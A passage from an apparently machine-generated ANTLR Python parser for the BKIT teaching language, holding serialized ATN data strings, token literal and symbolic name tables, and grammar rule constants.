buf.write(\"\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\\4&\\t\")\n buf.write(\"&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\3\\2\\3\\2\\3\\2\\7\\2Z\\n\\2\")\n buf.write(\"\\f\\2\\16\\2]\\13\\2\\3\\2\\7\\2`\\n\\2\\f\\2\\16\\2c\\13\\2\\3\\2\\3\\2\\3\")\n 
buf.write(\"\\3\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\5\\4q\\n\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\\3\\5\\3\\5\\3\\6\\3\\6\\3\\7\\3\\7\\3\\b\")\n buf.write(\"\\3\\b\\3\\b\\5\\b\\u0084\\n\\b\\3\\b\\3\\b\\3\\b\\5\\b\\u0089\\n\\b\\7\\b\\u008b\")\n buf.write(\"\\n\\b\\f\\b\\16\\b\\u008e\\13\\b\\3\\b\\3\\b\\3\\t\\3\\t\\5\\t\\u0094\\n\\t\")\n buf.write(\"\\3\\t\\3\\t\\3\\t\\5\\t\\u0099\\n\\t\\7\\t\\u009b\\n\\t\\f\\t\\16\\t\\u009e\")\n buf.write(\"\\13\\t\\3\\n\\3\\n\\3\\13\\3\\13\\3\\13\\3\\13\\6\\13\\u00a6\\n\\13\\r\\13\")\n buf.write(\"\\16\\13\\u00a7\\3\\13\\5\\13\\u00ab\\n\\13\\3\\f\\3\\f\\3\\f\\3\\f\\5\\f\")\n buf.write(\"\\u00b1\\n\\f\\3\\f\\6\\f\\u00b4\\n\\f\\r\\f\\16\\f\\u00b5\\3\\r\\3\\r\\5\")\n buf.write(\"\\r\\u00ba\\n\\r\\3\\r\\3\\r\\3\\r\\5\\r\\u00bf\\n\\r\\3\\16\\3\\16\\3\\16\")\n buf.write(\"\\3\\16\\3\\17\\3\\17\\3\\17\\3\\17\\3\\20\\3\\20\\3\\20\\7\\20\\u00cc\\n\")\n buf.write(\"\\20\\f\\20\\16\\20\\u00cf\\13\\20\\3\\21\\3\\21\\3\\21\\7\\21\\u00d4\\n\")\n buf.write(\"\\21\\f\\21\\16\\21\\u00d7\\13\\21\\3\\21\\7\\21\\u00da\\n\\21\\f\\21\\16\")\n buf.write(\"\\21\\u00dd\\13\\21\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\")\n buf.write(\"\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\")\n buf.write(\"\\5\\22\\u00f2\\n\\22\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\")\n buf.write(\"\\23\\3\\23\\7\\23\\u00fd\\n\\23\\f\\23\\16\\23\\u0100\\13\\23\\3\\23\\3\")\n buf.write(\"\\23\\5\\23\\u0104\\n\\23\\3\\23\\3\\23\\3\\23\\3\\24\\3\\24\\3\\25\\3\\25\")\n buf.write(\"\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\")\n buf.write(\"\\3\\26\\3\\26\\3\\26\\3\\26\\3\\26\\3\\26\\3\\26\\3\\27\\3\\27\\3\\27\\3\\27\")\n buf.write(\"\\3\\27\\3\\27\\3\\27\\3\\30\\3\\30\\3\\30\\3\\30\\3\\31\\3\\31\\3\\32\\3\\32\")\n buf.write(\"\\3\\33\\3\\33\\3\\34\\3\\34\\5\\34\\u0132\\n\\34\\3\\35\\3\\35\\3\\35\\3\")\n 
buf.write(\"\\35\\3\\36\\3\\36\\3\\37\\3\\37\\3 \\3 \\3 \\3 \\3 \\5 \\u0141\\n \\3!\")\n buf.write(\"\\3!\\3!\\3!\\3!\\3!\\7!\\u0149\\n!\\f!\\16!\\u014c\\13!\\3\\\"\\3\\\"\\3\")\n buf.write(\"\\\"\\3\\\"\\3\\\"\\3\\\"\\7\\\"\\u0154\\n\\\"\\f\\\"\\16\\\"\\u0157\\13\\\"\\3#\\3\")\n buf.write(\"#\\3#\\3#\\3#\\3#\\7#\\u015f\\n#\\f#\\16#\\u0162\\13#\\3$\\3$\\3$\\5\")\n buf.write(\"$\\u0167\\n$\\3%\\3%\\3%\\5%\\u016c\\n%\\3&\\3&\\3&\\3&\\5&\\u0172\\n\")\n buf.write(\"&\\3\\'\\3\\'\\5\\'\\u0176\\n\\'\\3(\\3(\\3(\\3(\\3(\\5(\\u017d\\n(\\3)\")\n buf.write(\"\\3)\\3)\\5)\\u0182\\n)\\3*\\3*\\3*\\3*\\3*\\7*\\u0189\\n*\\f*\\16*\\u018c\")\n buf.write(\"\\13*\\7*\\u018e\\n*\\f*\\16*\\u0191\\13*\\3*\\3*\\3+\\3+\\3+\\3+\\3\")\n buf.write(\"+\\3+\\3+\\3+\\3+\\5+\\u019e\\n+\\3+\\2\\5@BD,\\2\\4\\6\\b\\n\\f\\16\\20\")\n buf.write(\"\\22\\24\\26\\30\\32\\34\\36 \\\"$&(*,.\\60\\62\\64\\668:<>@BDFHJL\")\n buf.write(\"NPRT\\2\\b\\3\\2\\4\\7\\3\\2)\\63\\3\\2\\'(\\3\\2\\35 \\4\\2!!#%\\3\\2\\37\")\n buf.write(\" \\2\\u01a0\\2[\\3\\2\\2\\2\\4f\\3\\2\\2\\2\\6j\\3\\2\\2\\2\\bx\\3\\2\\2\\2\")\n buf.write(\"\\n|\\3\\2\\2\\2\\f~\\3\\2\\2\\2\\16\\u0080\\3\\2\\2\\2\\20\\u0093\\3\\2\\2\")\n buf.write(\"\\2\\22\\u009f\\3\\2\\2\\2\\24\\u00aa\\3\\2\\2\\2\\26\\u00ac\\3\\2\\2\\2\")\n buf.write(\"\\30\\u00b9\\3\\2\\2\\2\\32\\u00c0\\3\\2\\2\\2\\34\\u00c4\\3\\2\\2\\2\\36\")\n buf.write(\"\\u00c8\\3\\2\\2\\2 \\u00d5\\3\\2\\2\\2\\\"\\u00f1\\3\\2\\2\\2$\\u00f3\\3\")\n buf.write(\"\\2\\2\\2&\\u0108\\3\\2\\2\\2(\\u010a\\3\\2\\2\\2*\\u0117\\3\\2\\2\\2,\\u011e\")\n buf.write(\"\\3\\2\\2\\2.\\u0125\\3\\2\\2\\2\\60\\u0129\\3\\2\\2\\2\\62\\u012b\\3\\2\")\n buf.write(\"\\2\\2\\64\\u012d\\3\\2\\2\\2\\66\\u012f\\3\\2\\2\\28\\u0133\\3\\2\\2\\2\")\n buf.write(\":\\u0137\\3\\2\\2\\2<\\u0139\\3\\2\\2\\2>\\u0140\\3\\2\\2\\2@\\u0142\\3\")\n buf.write(\"\\2\\2\\2B\\u014d\\3\\2\\2\\2D\\u0158\\3\\2\\2\\2F\\u0166\\3\\2\\2\\2H\\u016b\")\n buf.write(\"\\3\\2\\2\\2J\\u0171\\3\\2\\2\\2L\\u0175\\3\\2\\2\\2N\\u017c\\3\\2\\2\\2\")\n 
buf.write(\"P\\u0181\\3\\2\\2\\2R\\u0183\\3\\2\\2\\2T\\u019d\\3\\2\\2\\2VW\\5\\4\\3\")\n buf.write(\"\\2WX\\7<\\2\\2XZ\\3\\2\\2\\2YV\\3\\2\\2\\2Z]\\3\\2\\2\\2[Y\\3\\2\\2\\2[\\\\\")\n buf.write(\"\\3\\2\\2\\2\\\\a\\3\\2\\2\\2][\\3\\2\\2\\2^`\\5\\6\\4\\2_^\\3\\2\\2\\2`c\\3\")\n buf.write(\"\\2\\2\\2a_\\3\\2\\2\\2ab\\3\\2\\2\\2bd\\3\\2\\2\\2ca\\3\\2\\2\\2de\\7\\2\\2\")\n buf.write(\"\\3e\\3\\3\\2\\2\\2fg\\7\\30\\2\\2gh\\7:\\2\\2hi\\5\\20\\t\\2i\\5\\3\\2\\2\")\n buf.write(\"\\2jk\\7\\23\\2\\2kl\\7:\\2\\2lp\\7\\3\\2\\2mn\\7\\25\\2\\2no\\7:\\2\\2o\")\n buf.write(\"q\\5\\36\\20\\2pm\\3\\2\\2\\2pq\\3\\2\\2\\2qr\\3\\2\\2\\2rs\\7\\b\\2\\2st\")\n buf.write(\"\\7:\\2\\2tu\\5 \\21\\2uv\\7\\17\\2\\2vw\\7;\\2\\2w\\7\\3\\2\\2\\2xy\\7\\3\")\n buf.write(\"\\2\\2yz\\7>\\2\\2z{\\5\\16\\b\\2{\\t\\3\\2\\2\\2|}\\t\\2\\2\\2}\\13\\3\\2\")\n buf.write(\"\\2\\2~\\177\\5\\16\\b\\2\\177\\r\\3\\2\\2\\2\\u0080\\u0083\\78\\2\\2\\u0081\")\n buf.write(\"\\u0084\\5\\n\\6\\2\\u0082\\u0084\\5\\f\\7\\2\\u0083\\u0081\\3\\2\\2\\2\")\n buf.write(\"\\u0083\\u0082\\3\\2\\2\\2\\u0084\\u008c\\3\\2\\2\\2\\u0085\\u0088\\7\")\n buf.write(\"=\\2\\2\\u0086\\u0089\\5\\n\\6\\2\\u0087\\u0089\\5\\f\\7\\2\\u0088\\u0086\")\n buf.write(\"\\3\\2\\2\\2\\u0088\\u0087\\3\\2\\2\\2\\u0089\\u008b\\3\\2\\2\\2\\u008a\")\n buf.write(\"\\u0085\\3\\2\\2\\2\\u008b\\u008e\\3\\2\\2\\2\\u008c\\u008a\\3\\2\\2\\2\")\n buf.write(\"\\u008c\\u008d\\3\\2\\2\\2\\u008d\\u008f\\3\\2\\2\\2\\u008e\\u008c\\3\")\n buf.write(\"\\2\\2\\2\\u008f\\u0090\\79\\2\\2\\u0090\\17\\3\\2\\2\\2\\u0091\\u0094\")\n buf.write(\"\\5\\24\\13\\2\\u0092\\u0094\\5\\30\\r\\2\\u0093\\u0091\\3\\2\\2\\2\\u0093\")\n buf.write(\"\\u0092\\3\\2\\2\\2\\u0094\\u009c\\3\\2\\2\\2\\u0095\\u0098\\7=\\2\\2\")\n buf.write(\"\\u0096\\u0099\\5\\24\\13\\2\\u0097\\u0099\\5\\30\\r\\2\\u0098\\u0096\")\n buf.write(\"\\3\\2\\2\\2\\u0098\\u0097\\3\\2\\2\\2\\u0099\\u009b\\3\\2\\2\\2\\u009a\")\n buf.write(\"\\u0095\\3\\2\\2\\2\\u009b\\u009e\\3\\2\\2\\2\\u009c\\u009a\\3\\2\\2\\2\")\n 
buf.write(\"\\u009c\\u009d\\3\\2\\2\\2\\u009d\\21\\3\\2\\2\\2\\u009e\\u009c\\3\\2\")\n buf.write(\"\\2\\2\\u009f\\u00a0\\7\\3\\2\\2\\u00a0\\23\\3\\2\\2\\2\\u00a1\\u00a5\")\n buf.write(\"\\7\\3\\2\\2\\u00a2\\u00a3\\7\\66\\2\\2\\u00a3\\u00a4\\7\\4\\2\\2\\u00a4\")\n buf.write(\"\\u00a6\\7\\67\\2\\2\\u00a5\\u00a2\\3\\2\\2\\2\\u00a6\\u00a7\\3\\2\\2\")\n buf.write(\"\\2\\u00a7\\u00a5\\3\\2\\2\\2\\u00a7\\u00a8\\3\\2\\2\\2\\u00a8\\u00ab\")\n buf.write(\"\\3\\2\\2\\2\\u00a9\\u00ab\\7\\3\\2\\2\\u00aa\\u00a1\\3\\2\\2\\2\\u00aa\")\n buf.write(\"\\u00a9\\3\\2\\2\\2\\u00ab\\25\\3\\2\\2\\2\\u00ac\\u00b3\\7\\3\\2\\2\\u00ad\")\n buf.write(\"\\u00b0\\7\\66\\2\\2\\u00ae\\u00b1\\5\\26\\f\\2\\u00af\\u00b1\\7\\4\\2\")\n buf.write(\"\\2\\u00b0\\u00ae\\3\\2\\2\\2\\u00b0\\u00af\\3\\2\\2\\2\\u00b1\\u00b2\")\n buf.write(\"\\3\\2\\2\\2\\u00b2\\u00b4\\7\\67\\2\\2\\u00b3\\u00ad\\3\\2\\2\\2\\u00b4\")\n buf.write(\"\\u00b5\\3\\2\\2\\2\\u00b5\\u00b3\\3\\2\\2\\2\\u00b5\\u00b6\\3\\2\\2\\2\")\n buf.write(\"\\u00b6\\27\\3\\2\\2\\2\\u00b7\\u00ba\\5\\26\\f\\2\\u00b8\\u00ba\\5\\22\")\n buf.write(\"\\n\\2\\u00b9\\u00b7\\3\\2\\2\\2\\u00b9\\u00b8\\3\\2\\2\\2\\u00ba\\u00bb\")\n buf.write(\"\\3\\2\\2\\2\\u00bb\\u00be\\7>\\2\\2\\u00bc\\u00bf\\5\\f\\7\\2\\u00bd\")\n buf.write(\"\\u00bf\\5\\n\\6\\2\\u00be\\u00bc\\3\\2\\2\\2\\u00be\\u00bd\\3\\2\\2\\2\")\n buf.write(\"\\u00bf\\31\\3\\2\\2\\2\\u00c0\\u00c1\\5\\26\\f\\2\\u00c1\\u00c2\\7>\")\n buf.write(\"\\2\\2\\u00c2\\u00c3\\5\\16\\b\\2\\u00c3\\33\\3\\2\\2\\2\\u00c4\\u00c5\")\n buf.write(\"\\5\\22\\n\\2\\u00c5\\u00c6\\7>\\2\\2\\u00c6\\u00c7\\5\\n\\6\\2\\u00c7\")\n buf.write(\"\\35\\3\\2\\2\\2\\u00c8\\u00cd\\5\\24\\13\\2\\u00c9\\u00ca\\7=\\2\\2\\u00ca\")\n buf.write(\"\\u00cc\\5\\24\\13\\2\\u00cb\\u00c9\\3\\2\\2\\2\\u00cc\\u00cf\\3\\2\\2\")\n buf.write(\"\\2\\u00cd\\u00cb\\3\\2\\2\\2\\u00cd\\u00ce\\3\\2\\2\\2\\u00ce\\37\\3\")\n buf.write(\"\\2\\2\\2\\u00cf\\u00cd\\3\\2\\2\\2\\u00d0\\u00d1\\5&\\24\\2\\u00d1\\u00d2\")\n 
buf.write(\"\\7<\\2\\2\\u00d2\\u00d4\\3\\2\\2\\2\\u00d3\\u00d0\\3\\2\\2\\2\\u00d4\")\n buf.write(\"\\u00d7\\3\\2\\2\\2\\u00d5\\u00d3\\3\\2\\2\\2\\u00d5\\u00d6\\3\\2\\2\\2\")\n buf.write(\"\\u00d6\\u00db\\3\\2\\2\\2\\u00d7\\u00d5\\3\\2\\2\\2\\u00d8\\u00da\\5\")\n buf.write(\"\\\"\\22\\2\\u00d9\\u00d8\\3\\2\\2\\2\\u00da\\u00dd\\3\\2\\2\\2\\u00db\")\n buf.write(\"\\u00d9\\3\\2\\2\\2\\u00db\\u00dc\\3\\2\\2\\2\\u00dc!\\3\\2\\2\\2\\u00dd\")\n buf.write(\"\\u00db\\3\\2\\2\\2\\u00de\\u00f2\\5$\\23\\2\\u00df\\u00f2\\5(\\25\\2\")\n buf.write(\"\\u00e0\\u00f2\\5*\\26\\2\\u00e1\\u00f2\\5,\\27\\2\\u00e2\\u00e3\\5\")\n buf.write(\".\\30\\2\\u00e3\\u00e4\\7<\\2\\2\\u00e4\\u00f2\\3\\2\\2\\2\\u00e5\\u00e6\")\n buf.write(\"\\5\\60\\31\\2\\u00e6\\u00e7\\7<\\2\\2\\u00e7\\u00f2\\3\\2\\2\\2\\u00e8\")\n buf.write(\"\\u00e9\\5\\62\\32\\2\\u00e9\\u00ea\\7<\\2\\2\\u00ea\\u00f2\\3\\2\\2\")\n buf.write(\"\\2\\u00eb\\u00ec\\5\\64\\33\\2\\u00ec\\u00ed\\7<\\2\\2\\u00ed\\u00f2\")\n buf.write(\"\\3\\2\\2\\2\\u00ee\\u00ef\\5\\66\\34\\2\\u00ef\\u00f0\\7<\\2\\2\\u00f0\")\n buf.write(\"\\u00f2\\3\\2\\2\\2\\u00f1\\u00de\\3\\2\\2\\2\\u00f1\\u00df\\3\\2\\2\\2\")\n buf.write(\"\\u00f1\\u00e0\\3\\2\\2\\2\\u00f1\\u00e1\\3\\2\\2\\2\\u00f1\\u00e2\\3\")\n buf.write(\"\\2\\2\\2\\u00f1\\u00e5\\3\\2\\2\\2\\u00f1\\u00e8\\3\\2\\2\\2\\u00f1\\u00eb\")\n buf.write(\"\\3\\2\\2\\2\\u00f1\\u00ee\\3\\2\\2\\2\\u00f2#\\3\\2\\2\\2\\u00f3\\u00f4\")\n buf.write(\"\\7\\24\\2\\2\\u00f4\\u00f5\\5> \\2\\u00f5\\u00f6\\7\\27\\2\\2\\u00f6\")\n buf.write(\"\\u00fe\\5 \\21\\2\\u00f7\\u00f8\\7\\r\\2\\2\\u00f8\\u00f9\\5> \\2\\u00f9\")\n buf.write(\"\\u00fa\\7\\27\\2\\2\\u00fa\\u00fb\\5 \\21\\2\\u00fb\\u00fd\\3\\2\\2\")\n buf.write(\"\\2\\u00fc\\u00f7\\3\\2\\2\\2\\u00fd\\u0100\\3\\2\\2\\2\\u00fe\\u00fc\")\n buf.write(\"\\3\\2\\2\\2\\u00fe\\u00ff\\3\\2\\2\\2\\u00ff\\u0103\\3\\2\\2\\2\\u0100\")\n buf.write(\"\\u00fe\\3\\2\\2\\2\\u0101\\u0102\\7\\f\\2\\2\\u0102\\u0104\\5 \\21\\2\")\n 
buf.write(\"\\u0103\\u0101\\3\\2\\2\\2\\u0103\\u0104\\3\\2\\2\\2\\u0104\\u0105\\3\")\n buf.write(\"\\2\\2\\2\\u0105\\u0106\\7\\16\\2\\2\\u0106\\u0107\\7;\\2\\2\\u0107%\")\n buf.write(\"\\3\\2\\2\\2\\u0108\\u0109\\5\\4\\3\\2\\u0109\\'\\3\\2\\2\\2\\u010a\\u010b\")\n buf.write(\"\\7\\22\\2\\2\\u010b\\u010c\\7\\64\\2\\2\\u010c\\u010d\\58\\35\\2\\u010d\")\n buf.write(\"\\u010e\\7=\\2\\2\\u010e\\u010f\\5:\\36\\2\\u010f\\u0110\\7=\\2\\2\\u0110\")\n buf.write(\"\\u0111\\5<\\37\\2\\u0111\\u0112\\7\\65\\2\\2\\u0112\\u0113\\7\\13\\2\")\n buf.write(\"\\2\\u0113\\u0114\\5 \\21\\2\\u0114\\u0115\\7\\20\\2\\2\\u0115\\u0116\")\n buf.write(\"\\7;\\2\\2\\u0116)\\3\\2\\2\\2\\u0117\\u0118\\7\\31\\2\\2\\u0118\\u0119\")\n buf.write(\"\\5> \\2\\u0119\\u011a\\7\\13\\2\\2\\u011a\\u011b\\5 \\21\\2\\u011b\")\n buf.write(\"\\u011c\\7\\21\\2\\2\\u011c\\u011d\\7;\\2\\2\\u011d+\\3\\2\\2\\2\\u011e\")\n buf.write(\"\\u011f\\7\\13\\2\\2\\u011f\\u0120\\5 \\21\\2\\u0120\\u0121\\7\\31\\2\")\n buf.write(\"\\2\\u0121\\u0122\\5> \\2\\u0122\\u0123\\7\\34\\2\\2\\u0123\\u0124\")\n buf.write(\"\\7;\\2\\2\\u0124-\\3\\2\\2\\2\\u0125\\u0126\\5\\24\\13\\2\\u0126\\u0127\")\n buf.write(\"\\7>\\2\\2\\u0127\\u0128\\5> \\2\\u0128/\\3\\2\\2\\2\\u0129\\u012a\\7\")\n buf.write(\"\\t\\2\\2\\u012a\\61\\3\\2\\2\\2\\u012b\\u012c\\7\\n\\2\\2\\u012c\\63\\3\")\n buf.write(\"\\2\\2\\2\\u012d\\u012e\\5R*\\2\\u012e\\65\\3\\2\\2\\2\\u012f\\u0131\")\n buf.write(\"\\7\\26\\2\\2\\u0130\\u0132\\5> \\2\\u0131\\u0130\\3\\2\\2\\2\\u0131\")\n buf.write(\"\\u0132\\3\\2\\2\\2\\u0132\\67\\3\\2\\2\\2\\u0133\\u0134\\5\\22\\n\\2\\u0134\")\n buf.write(\"\\u0135\\7>\\2\\2\\u0135\\u0136\\5> \\2\\u01369\\3\\2\\2\\2\\u0137\\u0138\")\n buf.write(\"\\5> \\2\\u0138;\\3\\2\\2\\2\\u0139\\u013a\\5> \\2\\u013a=\\3\\2\\2\\2\")\n buf.write(\"\\u013b\\u013c\\5@!\\2\\u013c\\u013d\\t\\3\\2\\2\\u013d\\u013e\\5@\")\n buf.write(\"!\\2\\u013e\\u0141\\3\\2\\2\\2\\u013f\\u0141\\5@!\\2\\u0140\\u013b\")\n 
buf.write(\"\\3\\2\\2\\2\\u0140\\u013f\\3\\2\\2\\2\\u0141?\\3\\2\\2\\2\\u0142\\u0143\")\n buf.write(\"\\b!\\1\\2\\u0143\\u0144\\5B\\\"\\2\\u0144\\u014a\\3\\2\\2\\2\\u0145\\u0146\")\n buf.write(\"\\f\\4\\2\\2\\u0146\\u0147\\t\\4\\2\\2\\u0147\\u0149\\5B\\\"\\2\\u0148\")\n buf.write(\"\\u0145\\3\\2\\2\\2\\u0149\\u014c\\3\\2\\2\\2\\u014a\\u0148\\3\\2\\2\\2\")\n buf.write(\"\\u014a\\u014b\\3\\2\\2\\2\\u014bA\\3\\2\\2\\2\\u014c\\u014a\\3\\2\\2\")\n buf.write(\"\\2\\u014d\\u014e\\b\\\"\\1\\2\\u014e\\u014f\\5D#\\2\\u014f\\u0155\\3\")\n buf.write(\"\\2\\2\\2\\u0150\\u0151\\f\\4\\2\\2\\u0151\\u0152\\t\\5\\2\\2\\u0152\\u0154\")\n buf.write(\"\\5D#\\2\\u0153\\u0150\\3\\2\\2\\2\\u0154\\u0157\\3\\2\\2\\2\\u0155\\u0153\")\n buf.write(\"\\3\\2\\2\\2\\u0155\\u0156\\3\\2\\2\\2\\u0156C\\3\\2\\2\\2\\u0157\\u0155\")\n buf.write(\"\\3\\2\\2\\2\\u0158\\u0159\\b#\\1\\2\\u0159\\u015a\\5F$\\2\\u015a\\u0160\")\n buf.write(\"\\3\\2\\2\\2\\u015b\\u015c\\f\\4\\2\\2\\u015c\\u015d\\t\\6\\2\\2\\u015d\")\n buf.write(\"\\u015f\\5F$\\2\\u015e\\u015b\\3\\2\\2\\2\\u015f\\u0162\\3\\2\\2\\2\\u0160\")\n buf.write(\"\\u015e\\3\\2\\2\\2\\u0160\\u0161\\3\\2\\2\\2\\u0161E\\3\\2\\2\\2\\u0162\")\n buf.write(\"\\u0160\\3\\2\\2\\2\\u0163\\u0164\\7&\\2\\2\\u0164\\u0167\\5F$\\2\\u0165\")\n buf.write(\"\\u0167\\5H%\\2\\u0166\\u0163\\3\\2\\2\\2\\u0166\\u0165\\3\\2\\2\\2\\u0167\")\n buf.write(\"G\\3\\2\\2\\2\\u0168\\u0169\\t\\7\\2\\2\\u0169\\u016c\\5H%\\2\\u016a\")\n buf.write(\"\\u016c\\5J&\\2\\u016b\\u0168\\3\\2\\2\\2\\u016b\\u016a\\3\\2\\2\\2\\u016c\")\n buf.write(\"I\\3\\2\\2\\2\\u016d\\u016e\\5L\\'\\2\\u016e\\u016f\\5T+\\2\\u016f\\u0172\")\n buf.write(\"\\3\\2\\2\\2\\u0170\\u0172\\5L\\'\\2\\u0171\\u016d\\3\\2\\2\\2\\u0171\")\n buf.write(\"\\u0170\\3\\2\\2\\2\\u0172K\\3\\2\\2\\2\\u0173\\u0176\\5R*\\2\\u0174\")\n buf.write(\"\\u0176\\5N(\\2\\u0175\\u0173\\3\\2\\2\\2\\u0175\\u0174\\3\\2\\2\\2\\u0176\")\n buf.write(\"M\\3\\2\\2\\2\\u0177\\u017d\\5P)\\2\\u0178\\u0179\\7\\64\\2\\2\\u0179\")\n buf.write(\"\\u017a\\5> 
\\2\\u017a\\u017b\\7\\65\\2\\2\\u017b\\u017d\\3\\2\\2\\2\")\n buf.write(\"\\u017c\\u0177\\3\\2\\2\\2\\u017c\\u0178\\3\\2\\2\\2\\u017dO\\3\\2\\2\")\n buf.write(\"\\2\\u017e\\u0182\\5\\24\\13\\2\\u017f\\u0182\\5\\n\\6\\2\\u0180\\u0182\")\n buf.write(\"\\5\\f\\7\\2\\u0181\\u017e\\3\\2\\2\\2\\u0181\\u017f\\3\\2\\2\\2\\u0181\")\n buf.write(\"\\u0180\\3\\2\\2\\2\\u0182Q\\3\\2\\2\\2\\u0183\\u0184\\7\\3\\2\\2\\u0184\")\n buf.write(\"\\u018f\\7\\64\\2\\2\\u0185\\u018a\\5> \\2\\u0186\\u0187\\7=\\2\\2\\u0187\")\n buf.write(\"\\u0189\\5> \\2\\u0188\\u0186\\3\\2\\2\\2\\u0189\\u018c\\3\\2\\2\\2\\u018a\")\n buf.write(\"\\u0188\\3\\2\\2\\2\\u018a\\u018b\\3\\2\\2\\2\\u018b\\u018e\\3\\2\\2\\2\")\n buf.write(\"\\u018c\\u018a\\3\\2\\2\\2\\u018d\\u0185\\3\\2\\2\\2\\u018e\\u0191\\3\")\n buf.write(\"\\2\\2\\2\\u018f\\u018d\\3\\2\\2\\2\\u018f\\u0190\\3\\2\\2\\2\\u0190\\u0192\")\n buf.write(\"\\3\\2\\2\\2\\u0191\\u018f\\3\\2\\2\\2\\u0192\\u0193\\7\\65\\2\\2\\u0193\")\n buf.write(\"S\\3\\2\\2\\2\\u0194\\u0195\\7\\66\\2\\2\\u0195\\u0196\\5> \\2\\u0196\")\n buf.write(\"\\u0197\\7\\67\\2\\2\\u0197\\u019e\\3\\2\\2\\2\\u0198\\u0199\\7\\66\\2\")\n buf.write(\"\\2\\u0199\\u019a\\5> \\2\\u019a\\u019b\\7\\67\\2\\2\\u019b\\u019c\")\n buf.write(\"\\5T+\\2\\u019c\\u019e\\3\\2\\2\\2\\u019d\\u0194\\3\\2\\2\\2\\u019d\\u0198\")\n buf.write(\"\\3\\2\\2\\2\\u019eU\\3\\2\\2\\2%[ap\\u0083\\u0088\\u008c\\u0093\\u0098\")\n buf.write(\"\\u009c\\u00a7\\u00aa\\u00b0\\u00b5\\u00b9\\u00be\\u00cd\\u00d5\")\n buf.write(\"\\u00db\\u00f1\\u00fe\\u0103\\u0131\\u0140\\u014a\\u0155\\u0160\")\n buf.write(\"\\u0166\\u016b\\u0171\\u0175\\u017c\\u0181\\u018a\\u018f\\u019d\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", 
\n \"<INVALID>\", \"<INVALID>\", \"'Body'\", \"'Break'\", \"'Continue'\", \n \"'Do'\", \"'Else'\", \"'ElseIf'\", \"'EndIf'\", \"'EndBody'\", \n \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \"'If'\", \n \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \n \"'-.'\", \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'\\\\%'\", \"'!'\", \n \"'&&'\", \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \n \"'>='\", \"'=/='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \n \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \n \"';'\", \"','\", \"'='\", \"'\\\"'\", \"'int_of_float'\", \"'int_of_string'\", \n \"'float_to_int'\", \"'float_of_string'\", \"'bool_of_string'\", \n \"'string_of_bool'\", \"'string_of_int'\", \"'string_of_float'\" ]\n\n symbolicNames = [ \"<INVALID>\", \"ID\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \n \"STRING_LIT\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \n \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \n \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \n \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \n \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \n \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \n \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \n \"DOUBLE_QUOTE\", \"INT_OF_FLOAT\", \"INT_OF_STRING\", \"FLOAT_TO_INT\", \n \"FLOAT_OF_STRING\", \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \n \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \"COMMENT\", \"WS\", \n \"ILLEGAL_ESCAPE\", 
\"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_array = 3\n RULE_primitive_data = 4\n RULE_composite_data = 5\n RULE_array_lit = 6\n RULE_var_list = 7\n RULE_scalar_var = 8\n RULE_var_non_init = 9\n RULE_composite_var = 10\n RULE_var_init = 11\n RULE_composite_init = 12\n RULE_primitive_init = 13\n RULE_params_list = 14\n RULE_stmt_list = 15\n RULE_stmt = 16\n RULE_if_stmt = 17\n RULE_var_declare_stmt = 18\n RULE_for_stmt = 19\n RULE_while_stmt = 20\n RULE_dowhile_stmt = 21\n RULE_assign_stmt = 22\n RULE_break_stmt = 23\n RULE_continue_stmt = 24\n RULE_call_stmt = 25\n RULE_return_stmt = 26\n 